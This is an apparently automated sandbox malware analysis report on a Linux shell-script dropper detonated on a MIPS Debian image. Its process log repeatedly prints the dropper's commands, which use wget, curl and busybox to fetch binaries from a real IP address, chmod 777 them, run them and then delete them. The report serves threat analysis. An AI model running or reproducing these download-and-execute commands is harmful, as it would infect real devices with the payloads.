Malware Analysis Report

2025-04-03 19:27

Sample ID 241028-dxep3awreq
Target d0aa4d8333f14e2cdeb6fd6a944d6ae7e035a12f91eda5f2f2e9c7a47e176165.sh
SHA256 d0aa4d8333f14e2cdeb6fd6a944d6ae7e035a12f91eda5f2f2e9c7a47e176165
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

d0aa4d8333f14e2cdeb6fd6a944d6ae7e035a12f91eda5f2f2e9c7a47e176165

Threat Level: Shows suspicious behavior

The file d0aa4d8333f14e2cdeb6fd6a944d6ae7e035a12f91eda5f2f2e9c7a47e176165.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-28 03:22

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-28 03:22

Reported

2024-10-28 03:25

Platform

debian9-mipsbe-20240611-en

Max time kernel

74s

Max time network

72s

Command Line

[/tmp/d0aa4d8333f14e2cdeb6fd6a944d6ae7e035a12f91eda5f2f2e9c7a47e176165.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d N/A
N/A /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h N/A
N/A /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae N/A
N/A /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd N/A
N/A /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 N/A
N/A /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i N/A
N/A /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u N/A
N/A /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv N/A
N/A /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd N/A
N/A /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo N/A
N/A /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj N/A
N/A /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC N/A
N/A /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH N/A
N/A /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 N/A
N/A /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d N/A
N/A /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h N/A
N/A /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae N/A
N/A /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd N/A
N/A /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 N/A
N/A /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i N/A
N/A /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u N/A
N/A /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv N/A
N/A /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd N/A
N/A /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo N/A
N/A /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj N/A
N/A /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC N/A
N/A /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH N/A
N/A /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h N/A
N/A N/A /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i /usr/bin/curl N/A
File opened for modification /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u /usr/bin/curl N/A
File opened for modification /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo /usr/bin/curl N/A
File opened for modification /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 /usr/bin/curl N/A
File opened for modification /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i /usr/bin/curl N/A
File opened for modification /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d /usr/bin/curl N/A
File opened for modification /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae /usr/bin/curl N/A
File opened for modification /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd /usr/bin/curl N/A
File opened for modification /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 /usr/bin/curl N/A
File opened for modification /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC /usr/bin/curl N/A
File opened for modification /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h /usr/bin/curl N/A
File opened for modification /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH /usr/bin/curl N/A
File opened for modification /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d /usr/bin/curl N/A
File opened for modification /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u /usr/bin/curl N/A
File opened for modification /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv /usr/bin/curl N/A
File opened for modification /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj /usr/bin/curl N/A
File opened for modification /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd /usr/bin/curl N/A
File opened for modification /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC /usr/bin/curl N/A
File opened for modification /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae /usr/bin/curl N/A
File opened for modification /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo /usr/bin/curl N/A
File opened for modification /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv /usr/bin/curl N/A
File opened for modification /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj /usr/bin/curl N/A
File opened for modification /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd /usr/bin/curl N/A
File opened for modification /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH /usr/bin/curl N/A
File opened for modification /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h /usr/bin/curl N/A
File opened for modification /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd /usr/bin/curl N/A
File opened for modification /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 /usr/bin/curl N/A
File opened for modification /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 /usr/bin/curl N/A

Processes

/tmp/d0aa4d8333f14e2cdeb6fd6a944d6ae7e035a12f91eda5f2f2e9c7a47e176165.sh

[/tmp/d0aa4d8333f14e2cdeb6fd6a944d6ae7e035a12f91eda5f2f2e9c7a47e176165.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/bin/chmod

[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d

[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/bin/rm

[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/usr/bin/wget

[wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/bin/chmod

[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h

[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/bin/rm

[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/usr/bin/wget

[wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/bin/chmod

[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae

[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/bin/rm

[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/usr/bin/wget

[wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/bin/chmod

[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd

[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/bin/rm

[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/usr/bin/wget

[wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/bin/chmod

[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20

[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/bin/rm

[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/usr/bin/wget

[wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/bin/chmod

[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i

[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/bin/rm

[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/usr/bin/wget

[wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/bin/chmod

[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u

[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/bin/rm

[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/usr/bin/wget

[wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/bin/chmod

[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv

[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/bin/rm

[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/usr/bin/wget

[wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/bin/chmod

[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd

[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/bin/rm

[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/usr/bin/wget

[wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/bin/chmod

[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo

[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/bin/rm

[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/usr/bin/wget

[wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/bin/chmod

[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj

[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/bin/rm

[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/usr/bin/wget

[wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/bin/chmod

[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC

[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/bin/rm

[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/usr/bin/wget

[wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/bin/chmod

[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH

[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/bin/rm

[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/usr/bin/wget

[wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/bin/chmod

[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6

[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/bin/rm

[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/usr/bin/wget

[wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/bin/chmod

[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d

[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/bin/rm

[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/usr/bin/wget

[wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/bin/chmod

[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h

[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/bin/rm

[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/usr/bin/wget

[wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/bin/chmod

[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae

[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/bin/rm

[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/usr/bin/wget

[wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/bin/chmod

[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd

[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/bin/rm

[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/usr/bin/wget

[wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/bin/chmod

[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20

[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/bin/rm

[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/usr/bin/wget

[wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/bin/chmod

[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i

[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/bin/rm

[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/usr/bin/wget

[wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/bin/chmod

[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u

[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/bin/rm

[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/usr/bin/wget

[wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/bin/chmod

[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv

[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/bin/rm

[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/usr/bin/wget

[wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/bin/busybox

